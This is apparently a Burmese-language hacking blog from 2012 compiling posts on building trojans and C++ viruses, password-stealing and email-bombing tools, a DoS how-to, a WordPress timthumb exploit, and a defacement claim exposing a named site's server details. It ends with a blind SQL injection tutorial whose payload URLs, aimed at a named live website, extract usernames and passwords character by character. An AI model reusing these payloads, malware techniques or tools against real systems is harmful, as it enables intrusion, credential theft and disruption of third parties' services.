Tuesday 28 August 2012

Huawei Phone ေတြရဲ႕ Clockworkmod Recovery မ်ား

(mmkie)နည္းပညာ မွတ္စု


Huawei Phone  ေတြရဲ႕ Clockworkmod Recovery ေတြကို ရွိသေလာက္တင္ေပးလိုက္ပါတယ္
ကိုယ့္ဆီမွာ ရွိရင္လည္း တင္ေပးၾကပါ အားလံုး အဆင္ေျပေအာင္လို႕ပါ
ကၽြန္ေတာ့္မွာ မရွိတာေတြကို ကြက္လပ္ခ်န္ထားခဲ့ပါတယ္ CWM အမ်ားစုက english ဘာသာနဲ႔ပါ
သက္ဆိုင္ရာဖုန္းအလိုက္ Clockworkmod သြင္းနည္းေတြကို ေအာက္မွာ ေဖာ္ျပထားပါတယ္
တစ္ခ်ိဳ႕ဖုန္းေတြ က်န္ပါေသးတယ္ အဆင္ေျပရင္ cwm သြင္းနည္းေတြကို ထပ္ျဖည္႕ႏုိင္ပါတယ္
ေအာက္မွာ clockworkmod recovery ေတြကို download link ေပးထားပါတယ္
မွတ္ခ်က္-Huawei Android Phones Driver က လုိလိုမယ္မယ္ေပးထားတာပါ တစ္ခ်ိဳ႕က cwm သြင္းရင္Driver လိုတာတုိ႕ျဖစ္တတ္ပါတယ္ ဒီမွာေဒါင္းပါ http://www.mediafire.com/?4r6d1u8df71727c

Thursday 23 August 2012

Hard Disk Space မ်ားမ်ားရရွိျပီး ကြန္ျပဴတာျမန္ဆန္ေစရန္

Hard Disk Space မ်ားမ်ားရရွိျပီး ကြန္ျပဴတာျမန္ဆန္ေစရန္

ကြန္ပ်ဴတာ တစ္လံုးမွာ hard disk ရဲ႕ လုပ္ေဆာင္မႈ႔ ဟာ အေရးပါလွပါတယ္ မိမိရဲ႕ hard disk မွာ free space နည္းေနရင္ ကြန္ပ်ဴတာ လုပ္ေဆာင္မႈ ေႏွးလာၿခင္း၊ program မ်ား run ရာတြင္ ၾကန္႔ၾကာၿခင္းတို႔ ၿဖစ္ေပၚလာေလ႔ရွိပါတယ္…. Window တစ္ခု စတင္ လိုက္တဲ႔ အခါကတည္းက default disk setting ကိုWaste capacity ကို မ်ားစြာေပးထားတာပါ ကြ်န္ေတာ္ တို႔က အဲဒီမလို အပ္တဲ႔ wasted capacityကို ေလွ်ာ႔ခ်လိုက္ၿခင္းအားၿဖင္႔ free space မ်ားမ်ားရ ရွိေအာင္ လုပ္ေဆာင္နိုင္မွာ ၿဖစ္ပါတယ္..
လုပ္ေဆာင္ရမဲ႔ အဆင္႔နည္းနည္းမ်ားပါတယ္.. တစ္ဆင္႔ၿခင္းကို ေသေသခ်ာခ်ာ လုပ္ေဆာင္ သြားရင္ လြယ္လြယ္ေလးပါ……

Thursday 16 August 2012

ကၽြန္ေတာ္သိသမွ် Windows Registry အေၾကာင္း


ကၽြန္ေတာ္သိသမွ် Windows Registry အေၾကာင္း


 
ကၽြန္ေတာ္သိသမွ်ကို ျပန္လည္ ရွင္းျပေပးတာပါ။ ကၽြန္ေတာ္႔ ထက္ပိုသိတဲ႕သူေတြ လည္းအမ်ားႀကီးရွိတာမုိ႔ ၀င္ေရာက္ျပင္ဆင္ေဆြးေႏြးေပးၾကပါ............... .

Windows Registry အေၾကာင္းကို အပိုင္း သံုးပိုင္းခြဲၿပီး ရွင္းျပပါမယ္။

   Chapter(1) - Windows Registry အေၾကာင္း
  Chapter(2) - Windows Registry ကို manual ျပဳျပင္ျခင္း
  Chapter(3) - Windows Registry ကို Script မ်ားေရးၿပီး ျပဳျပင္ျခင္း တို႔ျဖစ္ပါတယ္။

 

ကိုယ္ပိုင္ Trojan virus လုပ္ၿပီး တိုတ္ခိုက္ခ်င္းသူမ်ားအတြက္ပါ -1


ကိုယ္ပိုင္ Trojan virus လုပ္ၿပီး တိုတ္ခိုက္ခ်င္းသူမ်ားအတြက္ပါ -1



 C Programming Language ကိုသံုးျပီး Simple Trojan လုပ္နည္းေလးပါ။
ဒီ Trojan ဟာ root drive ( Windows ထဲမွာ ဒီ Trojan ကို run မိတဲ႔ Drive ပါ။ အမ်ားအားျဖင့္ေတာ့ C: Drive ပါ။) ရဲ႕ hard disk space ကို စားေအာင္လုပ္ထားတာပါ။ဒီ Trojan စ run တဲ႔အခ်ိန္ကစျပီး မိနစ္တိုင္းမွာ hard disk space ရဲ႕ 1GB ေလာက္ကို ျမန္ျမန္ဆန္ဆန္ပဲ စားသြားႏိုင္ပါတယ္။ ဒါေၾကာင့္ ဒီ Trojan ကို Space Eater Trojanလို႔ေခၚပါတယ္။ High level programming language နဲ႔ ေရးထားတဲ႔ Trojan ပါ။ ဒီ Trojan ရဲ႕ Source code ကို ဒီ Post ရဲ႕ ေအာက္ဆံုးမွာ Download လုပ္ႏိုင္ပါတယ္။ဒီ Trojan ဘယ္လိုအလုပ္လုပ္တယ္ဆိုတာ ၾကည့္ရေအာင္..

C++ compiler လုပ္နည္း


C++ compiler လုပ္နည္း




                         

ေနာက္ထပ္တင္ေပးမယ့္ ဗိုင္းရပ္ဖန္တီးျခင္းအပိုင္းေတြအတြက္ ဒီပို႔ကိုတင္ေပးလိုက္ပါတယ္။ ဘာလို႔လဲဆိုေတာ့ ဖန္တီးတဲ့ေနရာမွာ C Programming Languageကို သံုးမွာ ျဖစ္လို႔ပါ။ သိျပီး၊ တတ္ျပီးသားသူေတြအတြက္မဟုတ္ပါဘူး။ C Programming ကို မသိေသးတဲ႔သူေတြနဲ႔ C Programming ကို အခုမွစတင္သင္ၾကားေနသူေတြအတြက္ပါ။ ထံုစံအတိုင္း သူမ်ား post ကို ဘာသာျပန္ျပီးတင္ေပးလိုက္တာပါပဲ။ Borland C++ compiler 5.5 ကို ဘယ္လို install လုပ္မလဲနဲ႔ C Programs ကိုဘယ္လို Compile(ပ႐ိုဂရမ္ ဘာသာစကား တစ္ခုခုျဖင့္ ေရးသားထားေသာ အမိန္႔ညႊန္ၾကားခ်က္ ကို စက္နားလည္ေအာင္ ေျပာင္းလဲေပးရန္ ကြန္ပ်ဴတာပ႐ိုဂရမ္ကို အသံုးျပဳသည္။)ဘယ္လိုလုပ္မလဲ ဆိုတာပါ။

C++ ျဖင့္ Antivirus codeေရးနည္း



C++ ျဖင့္ Antivirus codeေရးနည္း
xxxxxxxxxxxxxxxxxxxxxxxxxxxxx

အမ်ားအားျဖင့္ေတာ့ Antivirus ကုမၸဏီေတြက ထိန္းသိမ္းထားတဲ႔အတြက္ Antivirus sample code ေတြကို Public ကို Release လုပ္ျခင္း မရွိပါဘူး။ ဒါေပမယ့္ C++ ကို အသံုးျပဳျပီး Antivirus code ဘယ္လိုေရးရတယ္ဆိုတာ ကို သိရသေလာက္ နမူနာေလး တင္ေပးလိုက္ပါတယ္။ ေလ့လာၾကည့္ပါ။




int main()
{
PathList = userSelectPaths();
MyVirusList mvl = findViruses(PathList);
if( mvl.empty() )

C++ Virus Guide-2


C++ Virus Guide-2


  
အရင္ post မွာ ေတာ္ေတာ္ေလး ရွင္းခဲ႔ျပီးပါျပီ... ဒီ post မွာေတာ့ payload အပိုင္းနဲ႔ taskmanager ေပၚ မလာေအာင္ လို႔ ဘယ္လိုလုပ္မလဲဆိုတာကို တင္ေပးထားပါတယ္။ ဒီ post ကိုမဖတ္ခင္မွာ C++ Virus Guide1 ကိုအရင္ဖတ္ဖို႔ လိုမယ္ထင္ပါတယ္...ဘာလို႔လဲဆိုေတာ့ အဲဒီ post က C++ Virus ေရးသားနည္းအတြက္ အေျခခံ မို႔လို႔ပါ။

 
ေအာက္မွာျပထားတဲ႔ code ကေတာ့ သင့္computer ရဲ႕ beep ထြက္လာေအာင္ျပဳလုပ္ႏိုင္ပါတယ္...

 
 
 
int Freq = 100;

int Duration = 100;

Beep(Freq,Duration);

C++ Virus Guide





  •                                                                                                    
     တိုတုိနဲ႔ လိုရင္းေရာက္ေအာင္ ရွင္းျပထားတဲ႔ Guide တစ္ခုပါ။ programming ကိုစတင္ဖို႔အတြက္ ဘာေတြလိုအပ္မလဲဆိုရင္...

     
    Win32 API Reference - လိုေတာ့မလိုအပ္ပါဘူး...ဒါေပမယ့္ အလြန္အကူအညီေပးႏိုင္ပါတယ္။ဒီမွာေတာ့ Dev C++ compiler ဒီလင့္မွာ ေဒါင္းပါကိုထပ္တင္ေပးလို္က္ပါတယ္။ Dev က ေကာင္းေကာင္း အကူအညီေပးနိုင္ပါတယ္...။ Microsoft Visual C++ 6.0 ကိုလည္း အသံုးျပဳႏိုင္ပါတယ္...ဒါေပမယ့္သိတဲ႔ အတိုင္းပဲ ပိုက္ဆံအကုန္အက်ရွိႏိုင္ပါတယ္... ။

     
    ကဲ...စလိုက္ၾကရေအာင္... Dev (သို႔) MSVC ကို ဖြင့္လိုက္ပါ...ျပီးရင္ Win 32 GUI (Graphical User Interface) အသစ္တစ္ခုကို ဖြင့္လိုက္ပါ...( Dev ရဲ႕ အသံုးျပဳပံုကို ဒီ webpage မွာသြားၾကည့္ႏိုင္ပါတယ္။) ျပီးရင္ ေအာက္မွာေဖာ္ျပထားတဲ႔ Source code ေတြကို ခ်န္ထားျပီး က်န္တဲ႔ code ေတြကို delete လိုက္ပါ...

Icon ကို ေျပာင္းမို႕ software

Icon ကို ေျပာင္းမို႕ software


တခါတရံမွာ (.exe) ဖိုင္ေတြရဲ႕ iconကို ေျပာင္းလဲဖို႔ လိုအပ္လာတတ္ပါတယ္။ Windows ထဲမွာလည္း ေျပာင္းလို႔ရ ပါတယ္။ TuneUp Winstyler ကဲ႔သို႔ေသာ icon ေျပာင္းလဲတဲ႔ Tools ေတြေတာ့ရွိပါတယ္။ ဒါေပမယ့္ တခါတေလမွာ ကိုယ့္ကြန္ျပဴတာထဲမွာသာ icon ပံုစံေတြ ေျပာင္းသြားျပီး အျခားကြန္ျပဴတာမ်ားကို ကိုယ္ iconပံုစံေျပာင္းထားတဲ႔ (.exe)ဖိုင္ေတြကို ပို႔လိုက္တဲ႔အခါ အဲဒီကြန္ျပဴတာမ
ွာ မူရင္း icon ပံုစံအတုိင္းပဲ ေဖာ္ျပတတ္ၾကပါတယ္။ ဒါေၾကာင့္ ဘယ္ကြန္ျပဴတာမွာပဲ ဖြင့္ဖြင့္ ကိုယ္ေျပာင္းလိုက္တဲ႔ icon ပံုစံေလးေတြအတိုင္းေပၚရေအာင္ softwareေလး တစ္ခုနဲ႔ မိတ္ဆက္ေပးပါမယ္။ အဲဒါကေတာ့ IconChanger Version 3.8 ပဲျဖစ္ပါတယ္။ WindownsXP ေရာ Vista မွာပါသံုးလို႔ရပါတယ္။

 
    အဲဒီ software trial version ကို ဒီမွာ http://minus.com/lA6MTpbqO9YxW အရင္ ေဒါင္းလုပ္ လုပ္ပါ။ ျပီးရင္ install လုပ္လိုက္ပါ။

Wednesday 15 August 2012

DBKL Web Vulnerability ( For Knowledge )


ကိုလင္း- သလႅာဝတီ created a doc.
DBKL Web Vulnerability ( For Knowledge )

DBKL Web Vulnerability ( For Knowledge )
Website ေတာ္ေတာ္မ်ားမ်ားက Web Vulnerability နဲ႔ လြတ္ဖုိ႔ဆုိတာ ခဲယဥး္ပါတယ္... ၀င္ေရာက္ေမြေႏွာက္တဲ႔နည္းလမ္းေတြကလည္း မ်ားပါ႔....

www.dbkl.gov.my မွာ XSS ၿဖစ္တာကုိ http://www.xssed.com/mirror/64058/ မွာ တင္ထားသလုိ အသိေပးခဲ႔တာလည္းၾကာပါၿပီ။
တစ္ခ်ဳိ႕က XSS က SQL Injection ေလာက္ေၾကာက္စရာမေကာင္းဘူးလုိ႔ထင္ၿပီး ဒီအတုိင္းထားၾကပါတယ္။ ဒါဟာ လုံး၀ကုိမွားပါတယ္။ သာမာန္ XSS က Phishing / Cookie Stealing ေတြရတာမဟုတ္ပါဘူး ၄င္းကုိ crimeware ေတြသုံးၿပီး malicious scripts နဲ႔အသုံးၿပဳလုိ႔လည္းရပါတယ္။

IP Address သိရင္ ဘယ္လိုဟက္လို႔ရႏိုင္သလဲ


IP Address သိရင္ ဘယ္လိုဟက္လို႔ရႏိုင္သလဲ





ဒီဟာကေတာ့ ရိုးရွင္းတဲ႔ အေျခခံ NETBIOS Post တစ္ခုျဖစ္ျပီး ဒီ post မွာတင္ထားတဲ႔ အခ်က္အလက္ေတြကို aCId_rAIn ကဖန္တီးခဲ႔တာျဖစ္ပါတယ္။ ဒီ post ကေနျပီး သင့္ကို NETBIOS အေၾကာင္း ကို ေဖာ္ျပေပးမွာျဖစ္ျပီး ၄င္းက ဘာလဲ ၊ ၄င္းကို ဘယ္လိုအသံုးျပဳႏိုင္သလဲ ၊ ၄င္းနဲ႔ ဘယ္လို hack ႏိုင္သလဲ ဒါ့အျပင္ သင့္အတြက္ ေနာင္တခ်ိန္မွာ အသံုး၀င္လာႏိုင္တဲ႔ ရုိးရွင္းတဲ႔ DOS comment မ်ားအေၾကာင္းပါ၀င္ပါတယ္။ အခုေဖာ္ျပေပးမယ့္ အခ်က္ေတြဟာ hacking ကို စတင္ေလ့လာသူမ်ားအတြက္သာ ျဖစ္ပါတယ္။

Hardware & Firmware

၁။ BIOS

BIOS ( short for Basic Input/Output Services) - ၄င္းဟာ PC မွာရွိတဲ႔ control program ျဖစ္ပါတယ္။ ၄င္းဟာ သင့္computer ကို starting up ျဖစ္ဖို႔အတြက္ systemရဲ႕

WP ရဲ ႔ Zero Day ဆိုျပီး အြန္လိုင္းမွာ အုပ္ေအာ္ ေသာင္းနင္းျဖစ္သြားတဲ့ Plugin



WP ရဲ ႔ Zero Day ဆိုျပီး အြန္လိုင္းမွာ အုပ္ေအာ္ ေသာင္းနင္းျဖစ္သြားတဲ့ Plugin ေလးအေၾကာင္း နည္းနည္းေျပာရေအာင္..။
ဒီ Hacking Tech: က ေပၚလာတာ လပိုင္းပဲရွိေသးတယ္ဗ် ျမန္မာျပည္မွာေတာင္ လူသိပ္မသိလွေသးဘူး..။ လက္ခ်ိဳးေရလို႔ရတယ္ သိတဲ့လူ…။

ေပါက္သြားတဲ့ Plugin ကေတာ့ timthumb.php ပါ timthumb ဟာ Photo ေတြကို ခ်ံဳ ႔ ခ်ဲ ႔လုပ္ရာမွာ အလြန္အသံုး၀င္တဲ့ Plugin တစ္ခုျဖစ္ပါတယ္ ဒါ့အျပင္ သူဟာ တျခား URL ကေန Photo ေတြကိုပါ လွမ္းယူႏိုင္ပါေသးတယ္ ဒီေနရာမွာေပါက္တာပါပဲ သူက တျခားလင့္ခ္
ေနရာက ပံုေတြယူမယ္ဆိုရင္ www.target.com/

password ေတြကို hack ခ်င္သူမ်ားအတြက္


ကိုလင္း- သလႅာဝတီ created a doc.
password ေတြကို hack ခ်င္သူမ်ားအတြက္  

password ေတြကို hack ခ်င္သူမ်ားအတြက္ အနည္းနဲ႔ အမ်ားေတာ့ အသံုး၀င္ပါတယ္... ဒီထဲမွာပါ၀င္တဲ႔ softwareမ်ား ရဲ႕ Featureေတြကို rar ထဲမွာရွိတဲ႔ read me file ထဲမွာ ဖတ္ရႈႏိုင္ပါတယ္။ အထဲမွာ Serial key လည္း ပါ၀င္ပါတယ္။
ပါ၀င္တာေတြကေတာ့ ...

Netscape password hacker

mozilla firefox password hacker

e-m ail id collector

transmissions mail bomber







Bomberႀကဲမယ္

Bomber ဆိုတာကေတာ့ ရိုေဘာ့ေလးေတြပါပဲ .... သူတို႔က အေျမာက္အမ်ားေသာ message ေတြ (သို႔) information ေတြ ကို အျခားသူ ( တုိက္ခိုက္ခံရသူ/သားေကာင္) ဆီကို ပို႔ေပးႏိုင္ပါတယ္။

Private_Email_Bomber_-_Version_3_2_



ဒီ program ကိုေတာ့ AlphaDog က ဖန္တီးခဲ႔တာျဖစ္ျပီး ဒီ browser ဟာ IE ေပၚမွာ အေျခခံျပဳလုပ္ထားတာျဖစ္ပါတယ္။ web searcher ေတြထဲတစ္ခုကို လ်င္ျမန္စြာ ေရြးခ်ယ္ႏိုင္ပါတယ္ :

-Google

-Yahoo

-You tube

-AOL

-Alta vista

-All the web

-Bing

-Ask

-Anime Freak xD

Hack Tool


ဒီ application ကိုအသံုးျပဳႏိုင္ဖို႔အတြက္ေတာ့ Gmail account တစ္ခုလိုအပ္ပါတယ္...။

minus၌ Downloadဆြဲပါ
http://minus.com/lFUQq0GFbJUME

mediafire၌ Downloadဆြဲပါ
http://www.mediafire.com/?8ivce0wxn35ev17

ဟက္ကာသမားမ်ားအတြက္ လိုအပ္ေသာ Tool မ်ား


ကိုလင္း- သလႅာဝတီ created a doc.
ဟက္ကာသမားမ်ားအတြက္ လိုအပ္ေသာ Tool မ်ား



အခုတင္ေပးထားတဲ႔ Pack ထဲမွာေတာ့ Hacking အတြက္ လုိအပ္တဲ႔ Tool မ်ားကို စုေပါင္းျပီး ထည့္ထားေပးပါတယ္။ ပါ၀င္တဲ႔ Application မ်ားကေတာ့...

AddrView
AnonFTP
AOL new
AppToService
arpinject
aspack21
Astaroth Joiner v2
atk-2.1

Computerအတြင္းသို႕ 15စကၠန႔္ အတြင္းထုိးေဖာက္ျခင္း


Computerအတြင္းသို႕ 15စကၠန႔္ အတြင္းထုိးေဖာက္ျခင္း

 


မွန္ပါသည္။ လုပ္လို႔ရပါတယ္။ အကယ္၍စာဖတ္သူဧ။္ စနစ္သည္ တိက်ေသာ လံုျခံဳေရးအားနည္းခ်က္မ်ား ရွိပါက ၁၅ စကၠန္႔ပိုင္းအတြင္းပင္ ခ်ိဳးေဖာက္ခံႏိုင္ရပါသည္။
ဒီအခန္းကိုစတင္ဖို႔အတြက္ ကၽႊန္ေတာ္စာဖတ္သူကို လုပ္ခိုင္းစရာတစ္ခ်ိဳ႕ရွိပါသည္။ အကယ္၍စာဖတ္သူသည္ Dial Up အသံုးျပဳပါက ခ်ိတ္ဆက္ဖို႔လိုပါလိမ့္မယ္။ DSL (သို႕) Cable သံုးပါက ဒီအဆင့္ကိုတခါတည္း ျပဳလုပ္ႏိုင္ပါသည္။

Windows 2000 ထိ OS မ်ားအတြက္
•    Start Menu ကိုႏွိပ္ပါ
•    Run ကိုရွာၿပီး ႏွိပ္ပါ
•    Winipcfg ကို Box ထဲတြင္ ရိုက္ထဲ့ၿပီး Enter ႏွိပ္ပါ
•    ဒီ Windows ေလးကို ျမင္ေတြ႕ရပါမယ္

Hacking Information



Hacking Information

 

အျခား အျခားေသာ forumေတြ၊ websiteေတြမွာ "Email ကို က်ေနာ္တုိ႔ ဘယ္လို hack ႏိုင္သလဲ? ခင္ဗ်ားက်ေနာ့္အတြက္ hack ေပးႏိုင္မလား ? ဆိုျပီး သန္းေပါင္းမ်ားစြာေသာလူေတြ ေမးေနၾကတာကို သတိျပဳမိၾကမယ္ ထင္ပါတယ္။ ဒီ့အတြက္ေၾကာင့္ ဒီ post ျဖစ္လာရတာျဖစ္ျပီး သင့္အတြက္ hacking နဲ႔ ဆိုင္တဲ႔ အေျခခံအေတြးအေခၚေလးေတြကို ေဖာ္ျပထားမွာ ျဖစ္ပါတယ္။ ဒါေတြကို ဘယ္လိုဆင့္ပြားျပီး အသံုးခ်ရမယ္ဆိုတာကေတာ့ သင္ ကိုယ့္ကိုကိုယ္ အားကိုးရပါလိမ့္မယ္။

ေနာက္ခံအေျခအေန
Hack တဲ႔ နည္းလမ္းေတြကို Windows 98 ဒီဇိုင္းျပဳလုပ္ျပီးကတည္းက စတင္ခဲ႔တာျဖစ္ပါတယ္။ Hacking ဆိုတာ အေျခခံအားျဖင့္ေတာ့ ေပ်ာ့ကြက္ ဟာကြက္ ကြင္းဆက္ေတြကို ရွာေဖြျပီး

ဘာToolမွ မလိုပဲ Denial of Service Attack လုပ္မယ္





ဘာToolမွ မလိုပဲ Denial of Service Attack လုပ္မယ္
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

- Dos Attack ဆိုတာ Denial of Service Attack ကိုဆိုလိုျခင္းျဖစ္ပါတယ္
ကိုယ္တိုက္္ခိုက္လိုေသာသူ၏ services မ်ားကိုပိတ္ပင္ျခင္းတစ္နည္းအားျဖင့္သူ၏လုပ္ငန္းမ်ားဆက္လက္မလုပ္
ေဆာင္ႏိုင္ေအာင္ရပ္ဆိုင္းပစ္ျခင္းတို႕ကိုဆိုလိုပါတယ္…


- End-user systems, servers, routers နဲ႕ Website စတာေတြကိုတိုက္ခိုက္ႏိုင္ပါတယ္
- တိုက္ခိုက္ဖို႕အတြက္လိုအပ္ခ်က္မ်ားကေတာ့
၁. Command Prompt (CMD or DOS) windows system မွာပါလာၿပီးသားျဖစ္ပါတယ္

Virus ေတြရန္မွ ကာကြယ္နည္း


Virus ေတြရန္မွ ကာကြယ္နည္း


ဟက္ကာသမားေတြလည္ ဒီလိုVirus မ်ားရန္မွ ကာကြယ္နည္းေတြကို သိထာသင့္ပါတယ္ {လူသစ္တန္းေတြကိုေျပာတာပါ}
ဟက္ကာေတြ အသံုးမ်ားတာေတာ့ Trojans Virusေတြနဲ႕ ေဆာ္ၾကပါတယ္.. အဲဒီ TrojansVirusေတြကို ဘယ္လိုတည္ေဆာက္တယ္ TrojansVirus ဆိုတာဘယ္လိုဆိုတာကို က်ေနာ္ အခန္းလိုက္တင္ျပေပးပါ မယ္ ေလာေလာဆယ္ မိမိကိုယ့္ကို ကာကြယ္မလို႕အတြက္ ဒါေတြကိုလည္ ေလ့လာထာသင့္ပါတယ္..အဲသလိုမွ မဟုတ္ပဲ သူမ်ားကိုတိုတ္ေနတုန္ ကိုယ့္ကိုလည္ သူမ်ားက ဝင္ေဆာ္ေနတာ မသိပဲ ျဖစ္ေနမွာဆိုလို႕ပါ ... ေညာင္းသီးလည္းစား ေလသံလည္နာေထာင္ေပါ့

Blind SQL Injection Tutorial


Blind SQL Injection Tutorial


Cyber Law India Website Hacked By MaDnI [ ZHC ]

http://www.cyberlawonline.in/course-detail.php

http://www.cyberlawonline.in/blog/


http://www.cyberlawonline.in/

    Server = Apache/2.2
    Version = 5.0.77-log
    Powered by = PHP/5.1.6,PleskLin
    Current User = 465602_cyberlawo@172.17.35.67

Database:465602_cyberlawonline

    information_schema
    465602_cyberlawonline

့hacker ေတာ္ေတာ္မ်ားမ်ားက software သံုးျခင္းကိုေရွာင္ပါတယ္ က်ြန္ေတာ္software ေတြမတင္ျခင္ေတာ့ဘူး  Cyber Law India website ကို ဟက္လုတ္သြားပါတယ္
SQL Injection attack နဲ့ ပါ ေျမက္မ်ားစြာေသာ website ေတြဟာ SQl attack နဲ့ တိုက္ခိုက္ျခင္းကိုခံ
ေနရပါတယ္ coad လိုင္းအမွားေတြနဲ့ web sever ကို တိုက္ခိုက္ျခင္းလို့ေခါ္ပါတယ္ အလြယ္ေပါ့
ဒီလို့တိုက္ခိုက္နိုင္တာကလည္း website admin တစ္ဦး၏website တည္ေဆာက္ထားမွူမ်ားညံဖ်င္းမွူ
web database မွာ ခိုင္မာစြာတည္ေဆာက္နိုင္ျခင္းမရွိေသာေျကာင့္ျဖစ္သည္  Sql attack နဲ့ ပက္သက္ျပီးေတာ့ နမူနာေပါ့ေနာ္  blind  Sql attack လို့ေခါ္ပါတယ္ တိုက္နည္းေတြကမ်ားေတာ့ျကံုရာနဲ့တိုက္တာေပါ့ အဲ့ေလ
Code:

http://www.edinooyin.com/news.php?id=5
web page တစ္ခုကို စတင္ ျပီးေတာ့ ကိုယ္ browser မွာစဖြင့္လိုက္ျပီး ဒီ website pages ေပါ္လာျပီဆိုတာနဲ့
စစမ္းလို့ရပါျပီး blind sql injection attack နည္းလို့သက္မွတ္ပါ
Code:
Quote

http://www.edinooyin.com/news.php?id=5 and 1=1
ဒါဟာအျမဲတမ္းမွန္ကန္ေနတဲ့ အေနအထားပါ ဒီ page ကို browser မွာ page loads လုတ္လိုက္တာနဲ့
normally အတိုင္ပဲ ဘာမွျဖစ္မသြားဘူး
အခုေတာ့တကယ္စျပီ
Code:
Quote

http://www.edinooyin.com/news.php?id=5 and 1=2
ဒါဟာ ကုတ္လိုင္းအမွားပါ
အခ်ို့ text, picture ေတြဒါမွာမဟုတ္ ဒီ website ၇ဲ့ web sever မွာ ခ်ိပ္ဆက္ထားတဲ့ ဟာေတြမရွိနိုင္တဲ့
data ေတြကို ဒီ website ၇ဲ့ web pages တစ္ခုမွာ ျပန္လည္ျပီး သတိရသြားေအာင္ ကိုယ္မိန္းမရသြားတဲ့အခ်ိန္မ်ာ ငယ္ခ်စ္သူနဲ့ေတြသြားသလိုပဲ လြမ္းေဆြးျပီး အူေျကာင္ေျကာင္ျဖစ္သြားေအာင္
လုတ္လိုက္တာပါ မရွိတာကိုမွာ ေတာင္းခံလိုက္တာပါ that site is vulrnable to blind sql injection.

1) Get the MySQL version

ဒီ website မွာတည္ေဆာက္ထားတဲံ MySQL version ကိုရမွ က်ြန္ေတာ္တို့က blind sql attack ကိုစတင္လို့ရမွာျဖစ္ပါတယ္
Code:
Quote

http://www.edinooyin.com/news.php?id=5 and substring(@@version,1,1)=4
ဒီလိုလုတ္လိုက္ရင္ ဒီ website ၇ဲ့ websever က ေနျပီးေတာမွန္ကန္တဲ့ version of MySQL is 4.
ျပန္ေပးလိမ္မယ္ 4 with 5, and if query return TRUE then the version is 5.
Code:
Quote

http://www.edinooyin.com/news.php?id=5 and substring(@@version,1,1)=5
2)
က်ြန္ေတာ္တို့ဟာ ကုတ္လိုင္းတစ္ခုကိုအသံုးျပုျပီးေတာ့ဆက္လက္ျပီး web sever ကိုေသြးတိုးစမ္းလိုက္တယ္ ဒီစမ္းမွူဟာ အလုပ္မလုတ္ဘူး
Code:
Quote

http://www.edinooyin.com/news.php?id=5 and (select 1)=1
ေနာက္ကုတ္လိုင္းတစ္ခုနဲ့စမ္းလိုက္တယ္ ဒီwebsite pageဟာ ပံုမွန္အတိုင္းပဲ ေ၇းသားထားတဲ့ ကုတ္လိုင္းကအလုတ္လုတ္တယ္
ဒါဆိုရင္ေတာ့ ဒီ website ၇ဲ့ websever ရဲ့ mysql.user ကိုရရ်ိေတာ့မယ္

code:
Quote

http://www.edinooyin.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1
ဒီ website ကို page loads လုတ္တဲ့အခါမွာပံုမွန္အတိုင္းပဲရရွိေနမယ္ဒါဟာက်ြန္ေတာ္တို့က
mysql.user မွာရွိေနတဲ့ password ေတြမွတ္ထားတဲ့load_file() ကို၀င္ေျဖယူမလို့ပါ
Code:
Quote

http://www.edinooyin.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1
ဒီ website ကို page loads လုတ္တဲ့အခါမွာပံုမွန္အတိုင္းပဲရရွိေနမယ္ ဆိုရင္ က်ြန္ေတာ္တို့ခန့္မွန္းထားတဲ့
ဒီဆိုက္ရဲ့ username နဲ့ password ဟာမွားသြားျပီးေနာက္တစ္ျကိမ္စရမယ္

4). Pull data from database
အျကမ္းဖက္လိုက္မယ္ ဒီဆိုက္ရဲ့ database အတြင္းမွာရွိတဲ့ ဒီwebsite ၇ဲ့ username နဲ့ password
ကိုဆြဲယူလိုက္မယ္
Code:
Quote
http://www.edinooyin.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80

ok ျပီ ဒါဟာဆြဲတြန္းလိုက္ေသာေျကာင္းထြက္ေပါ္လာတဲ့ character ပါဒီမွာျပတာကgreater then 80လို့ေခါ္တဲ့ >80ေလးကိုေတြမွာပါ80ထက္ျကီးတယ္ဆိုေတာ့
ဒီ website ကို page loads လုတ္တဲ့အခါမွာပံုမွန္အတိုင္းပဲရရွိေနမယ္ ဆိုရင္  တက္ျပီးက်ိုးစားရဦးမယ္
Code:
Quote
http://www.edinooyin.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95
we get TRUE, keep incrementin g
Code:
Quote
http://www.edinooyin.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98
TRUE again, higher
Code:
Quote
http://www.site.com/news.php and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99
FALSE!!!
Code:
Quote

http://www.edinooyin.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99
Note that i’m changed ,1,1 to ,2,1 to get the second character. (now it returns the second character, 1 character in lenght)

Code:
Quote

http://www.site.com/news.php and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99
TRUE, the page loads normally, higher.

Code:
Quote

http://www.edinooyin.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>107
FALSE, lower number.

Quote

Code:
http://www.site.com/news.php and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>104
TRUE, higher.

Quote

Code:
http://www.edinooyin.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>105
FALSE!!!
မတူညီတဲ့ စာဖက္သူေတြေျကာင့္အေသးစိပ္ရ်င္မျပခြင့္မရွိတာ နားလည္ေပးပါ စာဖက္သူအေနနဲ့
ဒီဆိုက္၇ဲ့ ထြက္ေပါ္လာတဲ့အေျခအေနေတါကိုေလ့လာျပီးေတာ့ပိုေကာင္းတဲ့ SQL INJECTOR
တစ္ခုျပုလုတ္နိုင္ပါေစလို့ဆုေတာင္းေပးလိုက္ပါတယ္ ဧဒင္ဦးယ်ဥ္ ကိုစမ္းသက္ထားျပီးအားနည္းခ်က္ေတြကို
ရွာေဖြျပီးအေကာင္းဆံုးျဖစ္ေအာင္လုတ္ထားပါမယ္ ေနာက္လည္း xxl attack အေျကာင္းကိုေရးပါမယ္
ျမန္မာျပည္တြင္ xxl attack ကိုကာကြယ္ထားတာ BHG အဖြဲ့ဆိုက္ပဲရွိပါေသးတယ္ ဘယ္လိုကာကြယ္ရမလဲေရးပါမယ္


